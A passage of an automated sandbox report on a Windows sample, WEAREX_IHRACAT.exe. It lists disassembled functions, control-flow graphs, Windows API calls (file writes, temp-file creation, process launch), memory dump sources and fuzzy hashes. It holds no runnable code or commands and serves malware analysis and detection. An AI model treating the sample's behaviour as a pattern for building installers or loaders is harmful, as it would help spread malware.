                            • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
                            • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                          • String ID:
                          • API String ID: 1767494692-3916222277
                          • Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                          • Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
                          • Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                          • Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760
                          Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 653 403060-40306e 654 403070-403086 SetFilePointer 653->654 655 40308c-403095 call 40317b 653->655 654->655 658 403175-403178 655->658 659 40309b-4030ae call 405bd7 655->659 662 403161 659->662 663 4030b4-4030c8 call 40317b 659->663 665 403163-403164 662->665 663->658 667 4030ce-4030d1 663->667 665->658 668 4030d3-4030d6 667->668 669 40313d-403143 667->669 672 403172 668->672 673 4030dc 668->673 670 403145 669->670 671 403148-40315f ReadFile 669->671 670->671 671->662 674 403166-40316f 671->674 672->658 675 4030e1-4030eb 673->675 674->672 676 4030f2-403104 call 405bd7 675->676 677 4030ed 675->677 676->662 680 403106-40311b WriteFile 676->680 677->676 681 403139-40313b 680->681 682 40311d-403120 680->682 681->665 682->681 683 403122-403135 682->683 683->675 684 403137 683->684 684->672
                          APIs
                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                          • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID: x>A
                          • API String ID: 539440098-3854404225
                          • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                          • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                          • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                          • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9
                          Function 00405B83 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 685 405b83-405b8f 686 405b90-405bc4 GetTickCount GetTempFileNameW 685->686 687 405bd3-405bd5 686->687 688 405bc6-405bc8 686->688 690 405bcd-405bd0 687->690 688->686 689 405bca 688->689 689->690
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405BA1
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-944333549
                          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                          • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                          • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 691 401e51-401e62 call 402b38 call 405192 call 405663 697 401e67-401e6c 691->697 698 402791-402798 697->698 699 401e72-401e75 697->699 700 4029c5-4029d4 698->700 701 401ec6-401ecf CloseHandle 699->701 702 401e77-401e87 WaitForSingleObject 699->702 701->700 704 401e97-401e99 702->704 706 401e89-401e95 call 40628b WaitForSingleObject 704->706 707 401e9b-401eab GetExitCodeProcess 704->707 706->704 709 401eba-401ebd 707->709 710 401ead-401eb8 call 405e2f 707->710 709->701 713 401ebf 709->713 710->701 713->701
                          APIs
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                            • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                            • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                          • String ID:
                          • API String ID: 3585118688-0
                          • Opcode ID: 18e729e9311eced89f74fef4852527ff5c4aaa679bc8a991e6a2a0c3759d6c3f
                          • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                          • Opcode Fuzzy Hash: 18e729e9311eced89f74fef4852527ff5c4aaa679bc8a991e6a2a0c3759d6c3f
                          • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                          Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                          • CloseHandle.KERNEL32(?), ref: 00405695
                          Strings
                          • Error launching installer, xrefs: 00405676
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                          • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                          • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                          Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061DF
                            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061F3
                            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00406206
                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00403345
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-2414109610
                          • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                          • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                          • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                          • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                          Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                          • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                          • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                          • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                          Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                          • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                          • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                          • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                          Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                          • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                          • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                          • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                          Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                          • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                          • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                          • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                          Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                          • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                          • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                          • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                          Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                          • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                          • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                          • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                          Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
